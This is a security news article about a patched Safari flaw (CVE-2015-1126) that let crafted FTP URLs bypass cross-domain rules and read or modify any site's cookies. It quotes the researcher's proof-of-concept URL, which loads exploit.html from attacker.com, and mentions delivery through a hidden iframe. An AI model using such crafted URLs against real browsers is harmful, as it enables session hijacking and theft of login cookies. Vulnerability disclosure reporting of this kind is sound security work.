Security Affairs
Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

Safari cookie access vulnerability affects a billion iThings

A Safari iOS/OS X/Windows cookie access vulnerability (CVE-2015-1126) potentially affects a billion iThings devices, patch it as soon as possible. The security researcher Jouko Pynnönen at Finnish firm Klikki Oy, has discovered a since patched bug (CVE-2015-1126) that could potentially affect a billion Apple iDevices. The cross-domain vulnerability affects Safari’s file transfer URL schemes and […]

iLeakage

A Safari iOS/OS X/Windows cookie access vulnerability (CVE-2015-1126) potentially affects a billion iThings devices, patch it as soon as possible.

The security researcher Jouko Pynnönen at Finnish firm Klikki Oy, has discovered a since patched bug (CVE-2015-1126) that could potentially affect a billion Apple iDevices. The cross-domain vulnerability affects Safari’s file transfer URL schemes and could be exploited by attackers to create specially crafted web page which, when visited by a target user, bypasses some of the normal cross-domain restrictions to access or modify HTTP cookies belonging to any website.

“An attacker could create web content which, when viewed by a target user, bypasses some of the normal cross-domain restrictions to access or modify HTTP cookies belonging to any website.” Pynnönen wrote in a security advisory. “Most websites which allow user logins store their authentication information (usually session keys) in cookies. Access to these cookies would allow hijacking authenticated sessions. All tested Safari versions on iOS, OS X, and Windows were vulnerable. The number of affected devices may be of the order of one billion.”

The researcher explained that the Safari browser running on iOS 8.1, 6.1.6, and versions 7.0.4 and 5.1.7 on OS X 10.9.3 and Windows 8.1 are vulnerable.

Safari flawThe security issue it triggered in present of encoded special characters the user or password field of the URL, an example of problematic link could be

ftp://user:password@host/path

when the user or password fields include encoded special characters. By manipulating the URL, the attacker can allow documents to be loaded from their sites.

Pynnönen provided the following example URL as PoC

ftp://user%40attacker.com%2Fexploit.html%23@apple.com/

using a vulnerable version will cause the loading of a document from the website attacker.com controlled by the attackers, meanwhile patched browsers would pull a document from Apple. A vulnerable browser will decode the URL in:

ftp://user@attacker.com/exploit.html#apple.com/

“The attacker-supplied document, exploit.html, can therefore access and modify cookies belonging to apple.com via JavaScript.” explain Pynnönen.

The attack can be run by embedding IFRAME pointing to an FTP URL in an apparently harmless webpage.

The vulnerability is Safari was fixed byApple, users can check is their browser is vulnerable using the Safari cookie vulnerability test published by Pynnönen.

Pierluigi Paganini

(Security Affairs –  Apple Safari, iThings)